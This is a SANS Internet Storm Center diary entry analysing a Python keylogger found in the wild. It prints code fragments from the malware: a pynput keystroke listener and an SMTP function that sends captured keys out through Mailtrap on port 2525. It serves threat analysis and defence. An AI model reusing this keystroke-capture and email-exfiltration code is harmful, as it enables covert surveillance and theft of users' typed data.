Python Keylogger Using, (Sat, Dec 23rd)

Category :

SANS Full Feed

Posted On :

I found another Python keylogger… This is pretty common because Python has plenty of modules to implement this technique in a few lines of code:

from pynput import keyboard
from pynput.keyboard import Listener

keyboard_listener = keyboard.Listener(on_press=self.save_data)
with keyboard_listener:

This is not the most interesting part of the malicious script. When data (key presses) are collected, they must be exfiltrated to the attacker’s C2. These days, Discord is very popular. I also found many abused Google Mail accounts.

But, in this case, the attacker used another popular online service:[1]. This service is “an email sandbox to inspect and debug emails in staging, dev, and QA environments before sending them to recipients in production”. You may register a free account and get an environment to get emails for free! Mailtrap will provide an authenticated SMTP server to send them emails. Here is the code from the malicious script:

def send_mail(self, email, password, message):
sender = “Private Person <[email protected]>”
receiver = “A Test User <[email protected]>”
m = f”””
Subject: main Mailtrap
To: {receiver}
From: {sender}

Keylogger by aydinnyunusn”””

m += message
with smtplib.SMTP(“”, 2525) as server:
server.login(email, password)
server.sendmail(sender, receiver, message)

Mailtrap accepts emails on the following ports: 25, 465, 587 or 2525. Strangely, the last port was used in the script because there are chances that it will be blocked in corporate environments. Otherwise, it’s a nice way to fly below the radar…

Conclusion: another free online service (ab)used by attackers!

Script SHA256: 9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d/ with a VT score of 8/61[2]


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.